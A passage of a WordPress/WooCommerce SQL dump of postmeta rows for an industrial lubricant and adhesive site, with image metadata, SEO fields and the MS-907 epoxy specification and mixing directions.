INSERT INTO `wp_postmeta` VALUES (12811, 1111, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (12812, 1111, '_product_image_gallery', '380,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (12813, 1111, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12814, 843, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12815, 1113, '_edit_lock', '1475848363:2'); 
INSERT INTO `wp_postmeta` VALUES (12816, 1113, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (12817, 1113, '_thumbnail_id', '1079'); 
INSERT INTO `wp_postmeta` VALUES (12820, 1113, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (12824, 1113, '_aioseop_noindex', 'on'); 
INSERT INTO `wp_postmeta` VALUES (12825, 1115, '_edit_lock', '1476302651:2'); 
INSERT INTO `wp_postmeta` VALUES (12826, 1115, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (12827, 1115, '_thumbnail_id', '240'); 
INSERT INTO `wp_postmeta` VALUES (12834, 1115, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (12835, 1117, '_edit_lock', '1476302891:2'); 
INSERT INTO `wp_postmeta` VALUES (12836, 1117, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (12837, 1118, '_wp_attached_file', '2016/08/krytox-grease-electric-motor.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12838, 1118, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2600;s:6:"height";i:1733;s:4:"file";s:40:"2016/08/krytox-grease-electric-motor.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:40:"krytox-grease-electric-motor-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:40:"krytox-grease-electric-motor-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:40:"krytox-grease-electric-motor-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:42:"krytox-grease-electric-motor-1600x1066.jpg";s:5:"width";i:1600;s:6:"height";i:1066;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:40:"krytox-grease-electric-motor-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:40:"krytox-grease-electric-motor-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:40:"krytox-grease-electric-motor-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:40:"krytox-grease-electric-motor-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12839, 1117, '_thumbnail_id', '1118'); 
INSERT INTO `wp_postmeta` VALUES (12842, 1117, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (12861, 1121, '_edit_lock', '1476472415:3'); 
INSERT INTO `wp_postmeta` VALUES (12862, 1121, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (12865, 1121, '_thumbnail_id', '957'); 
INSERT INTO `wp_postmeta` VALUES (12868, 1121, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (12881, 1125, '_wp_attached_file', '2016/08/shutterstock_377391160.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12882, 1125, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:7360;s:6:"height";i:4912;s:4:"file";s:34:"2016/08/shutterstock_377391160.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_377391160-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_377391160-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_377391160-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_377391160-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_377391160-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_377391160-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_377391160-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_377391160-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12895, 1117, '_aioseop_description', 'A North American company improves equipment reliability by switching lubricants.'); 
INSERT INTO `wp_postmeta` VALUES (12896, 1117, '_aioseop_title', 'Krytox Lube for Life'); 
INSERT INTO `wp_postmeta` VALUES (12897, 1128, '_edit_lock', '1489605272:2'); 
INSERT INTO `wp_postmeta` VALUES (12898, 1128, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (12902, 1128, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (12908, 1132, '_wp_attached_file', '2016/08/fluoroextreme-dental-e1472662665528.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12909, 1132, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:533;s:6:"height";i:444;s:4:"file";s:47:"2016/08/fluoroextreme-dental-e1472662665528.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:47:"fluoroextreme-dental-e1472662665528-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:47:"fluoroextreme-dental-e1472662665528-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:47:"fluoroextreme-dental-e1472662665528-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:47:"fluoroextreme-dental-e1472662665528-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:47:"fluoroextreme-dental-e1472662665528-510x444.jpg";s:5:"width";i:510;s:6:"height";i:444;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12913, 1132, '_wp_attachment_backup_sizes', 'a:5:{s:9:"full-orig";a:3:{s:5:"width";i:533;s:6:"height";i:444;s:4:"file";s:24:"fluoroextreme-dental.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:32:"fluoroextreme-dental-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:32:"fluoroextreme-dental-180x180.jpg";s:5:"width";i:180;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:32:"fluoroextreme-dental-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:32:"fluoroextreme-dental-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (12914, 1128, '_thumbnail_id', '1132'); 
INSERT INTO `wp_postmeta` VALUES (12917, 1135, '_edit_lock', '1476379627:3'); 
INSERT INTO `wp_postmeta` VALUES (12918, 1135, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (12921, 1135, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (12927, 580, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12928, 1138, '_wp_attached_file', '2016/08/miller_scene.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12929, 1138, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:800;s:6:"height";i:400;s:4:"file";s:24:"2016/08/miller_scene.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"miller_scene-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"miller_scene-800x400.jpg";s:5:"width";i:800;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"miller_scene-768x384.jpg";s:5:"width";i:768;s:6:"height";i:384;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:24:"miller_scene-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"miller_scene-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:24:"miller_scene-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:24:"miller_scene-510x400.jpg";s:5:"width";i:510;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:63;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12930, 1139, '_wp_attached_file', '2016/08/FINISH-LINE.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12931, 1139, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4254;s:6:"height";i:2830;s:4:"file";s:23:"2016/08/FINISH-LINE.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"FINISH-LINE-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:23:"FINISH-LINE-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"FINISH-LINE-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"FINISH-LINE-1600x1064.jpg";s:5:"width";i:1600;s:6:"height";i:1064;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"FINISH-LINE-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"FINISH-LINE-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"FINISH-LINE-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:23:"FINISH-LINE-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12932, 1140, '_wp_attached_file', '2016/08/KRYTOX-bearings.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12933, 1140, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4256;s:6:"height";i:2832;s:4:"file";s:27:"2016/08/KRYTOX-bearings.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"KRYTOX-bearings-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:27:"KRYTOX-bearings-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"KRYTOX-bearings-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"KRYTOX-bearings-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"KRYTOX-bearings-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"KRYTOX-bearings-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"KRYTOX-bearings-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:27:"KRYTOX-bearings-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12934, 1141, '_wp_attached_file', '2016/08/TRIBOSys.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12935, 1141, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2000;s:4:"file";s:20:"2016/08/TRIBOSys.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"TRIBOSys-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"TRIBOSys-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"TRIBOSys-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"TRIBOSys-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"TRIBOSys-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"TRIBOSys-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"TRIBOSys-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"TRIBOSys-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12936, 1142, '_wp_attached_file', '2016/08/Finishline.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12937, 1142, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6000;s:6:"height";i:4000;s:4:"file";s:22:"2016/08/Finishline.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"Finishline-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:22:"Finishline-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"Finishline-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"Finishline-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:22:"Finishline-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:22:"Finishline-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:22:"Finishline-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:22:"Finishline-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12938, 1148, '_wp_attached_file', '2016/09/MS-907-epoxy-adhesive-kit.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12939, 1148, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3498;s:6:"height";i:2667;s:4:"file";s:37:"2016/09/MS-907-epoxy-adhesive-kit.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:37:"MS-907-epoxy-adhesive-kit-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:37:"MS-907-epoxy-adhesive-kit-800x610.jpg";s:5:"width";i:800;s:6:"height";i:610;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:37:"MS-907-epoxy-adhesive-kit-768x586.jpg";s:5:"width";i:768;s:6:"height";i:586;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:39:"MS-907-epoxy-adhesive-kit-1600x1220.jpg";s:5:"width";i:1600;s:6:"height";i:1220;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:37:"MS-907-epoxy-adhesive-kit-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:37:"MS-907-epoxy-adhesive-kit-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:37:"MS-907-epoxy-adhesive-kit-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:37:"MS-907-epoxy-adhesive-kit-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:7:"unknown";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12940, 1149, '_edit_lock', '1480020737:3'); 
INSERT INTO `wp_postmeta` VALUES (12941, 1149, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (12942, 1150, '_wp_attached_file', '2016/09/MS-907.doc'); 
INSERT INTO `wp_postmeta` VALUES (12943, 1149, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (12944, 1149, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (12945, 1149, '312_default_editor', '<table style="height: 615px;" width="593">\r\n<tbody>\r\n<tr>\r\n<td width="150"><strong>BONDING STRENGTH</strong></td>\r\n<td width="348">To 3,000 PSI</td>\r\n</tr>\r\n<tr>\r\n<td width="150"><strong> </strong>\r\n\r\n<strong>FORM</strong></td>\r\n<td width="348">A two-part paste adhesive packaged in equal volume tubes.</td>\r\n</tr>\r\n<tr>\r\n<td width="150"><strong> </strong>\r\n\r\n<strong>COLOR</strong>\r\n\r\n&nbsp;</td>\r\n<td width="348">Part A is blue.  Part B is beige.  When thoroughly mixed, the result is light blue.</td>\r\n</tr>\r\n<tr>\r\n<td width="150"><strong>VISCOSITY</strong></td>\r\n<td width="348">Approximately 120,000 cP, thixotropic.</td>\r\n</tr>\r\n<tr>\r\n<td width="150"><strong>MIX RATIO</strong></td>\r\n<td width="348">Equal parts by volume.</td>\r\n</tr>\r\n<tr>\r\n<td width="150"><strong>POT LIFE</strong></td>\r\n<td width="348">20 minutes at 77˚F, 200 grams</td>\r\n</tr>\r\n<tr>\r\n<td width="150"><strong>CURE TIME</strong></td>\r\n<td width="348">24 hours at 77˚F, or 2 hours at 140˚F, or\r\n\r\n1 hour at 180˚F. Do not attempt to cure below 60˚F.</td>\r\n</tr>\r\n<tr>\r\n<td width="150"><strong>SERVICE TEMPERATURE</strong></td>\r\n<td width="348">-50˚ to 180˚F</td>\r\n</tr>\r\n<tr>\r\n<td width="150"><strong>SHELF LIFE</strong></td>\r\n<td width="348">More than 1 year at 75˚F.</td>\r\n</tr>\r\n<tr>\r\n<td width="150"><strong>SPECIAL PROPERTIES</strong></td>\r\n<td width="348">Good adhesion to wide variety of surfaces.\r\n\r\nColor-coded for proper mixing.</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (12946, 1149, '716_default_editor', '<strong>DIRECTIONS:</strong>\r\n<ul>\r\n 	<li><strong>CLEAN SURFACES </strong>Surfaces to be bonded must be clean, dry and free of oil,grease or wax.  Roughen nonporous surfaces with sandpaper or emery paper for hard materials.</li>\r\n 	<li><strong>MIX EQUAL PARTS </strong>Squeeze a length from tube A on a clean, dry, flat disposable surface.  Use uniform pressure for even bead.  Parallel to tube A, run an equal length bead from tube B.longer.  When properly mixed, the adhesive is light blue</li>\r\n 	<li><strong>APPLY TO BOTH SURFACES </strong>Cover entire area evenly.</li>\r\n 	<li><strong>JOIN PARTS TOGETHER FIRMLY </strong>Squeeze out excess adhesive to form thin glue line.  A larger area will require more pressure.  Hold parts together with\r\nclamps, weights or tape</li>\r\n 	<li><strong>MIX THOROUGHLY </strong>Important! Mix the two beads together for 3 minutes</li>\r\n 	<li><strong>REMOVE EXCESS ADHESIVE PROMPTLY </strong>Before adhesive hardens,scrape with putty knife.  Clean with lacquer thinner, acetone or turpentine.  Once cured, adhesive may be removed by sanding.</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12947, 1149, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12948, 1149, '318_custom_list_file', 'a:1:{s:32:"06d31dc32f5ebfa692c0de660b41b9d1";a:3:{s:4:"name";s:6:"MS-907";s:4:"file";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.doc";s:4:"desc";s:10:"MS-907 TDS";}}'); 
INSERT INTO `wp_postmeta` VALUES (12949, 1149, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12950, 1149, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (12951, 1149, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (12952, 1149, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12953, 1149, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12954, 1149, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (12955, 1149, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12956, 1149, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (12957, 1149, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (12958, 1149, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (12959, 1149, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (12960, 1149, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (12961, 1149, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12962, 1149, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12963, 1149, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12964, 1149, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (12965, 1149, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (12966, 1149, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12967, 1149, '_sold_individually', ''); 
